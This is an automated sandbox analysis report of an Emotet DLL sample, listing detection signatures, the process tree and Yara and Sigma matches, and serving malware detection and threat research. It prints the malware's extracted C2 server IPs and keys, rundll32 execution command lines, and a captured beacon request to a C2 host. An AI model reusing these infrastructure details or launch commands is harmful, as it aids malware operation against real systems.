Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report spZRMihlrkFGqYq1f.dll

Overview

General Information

Sample Name:spZRMihlrkFGqYq1f.dll
Analysis ID:531996
MD5:9f4fa905fd685d28c4ff28f24ad224a1
SHA1:e186e0869276d3af6465d7c754b22527c7ac2ced
SHA256:808e8247efd685bdbae3ea0e55de1e8ed8aecd1359a213b0c6291b73f007fdaf
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6816 cmdline: loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6860 cmdline: rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6880 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6792 cmdline: rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 3476 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 29 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.5880000.10.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.rundll32.exe.56b0000.6.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.rundll32.exe.4910000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.rundll32.exe.3f80000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    7.2.rundll32.exe.59a0000.13.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 46 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4928, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, ProcessId: 3476

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 7.2.rundll32.exe.5970000.12.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: spZRMihlrkFGqYq1f.dllMetadefender: Detection: 42%Perma Link
                      Source: spZRMihlrkFGqYq1f.dllReversingLabs: Detection: 56%
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49775 version: TLS 1.2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1A80 FindFirstFileW,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49775 -> 51.178.61.60:443
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 51.178.61.60:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 45.79.33.48:8080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 177.72.80.14:7080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIwHost: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 196.44.98.190 196.44.98.190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.824813205.000001A7703A0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.824813205.000001A7703A0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 0000000C.00000002.841835956.000001A770300000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000000C.00000003.818284709.000001A77038B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818383957.000001A770802000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818022632.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818039351.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818344967.000001A770372000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF1027 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIwHost: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49775 version: TLS 1.2
                      Source: loaddll32.exe, 00000000.00000002.714043179.0000000000BFB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10014B67 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002C51C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4910000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.59a0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5bd0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.34d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4710000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.42d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.58b0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ed0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a70000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.raw.unpack, type: UNPACKEDPE
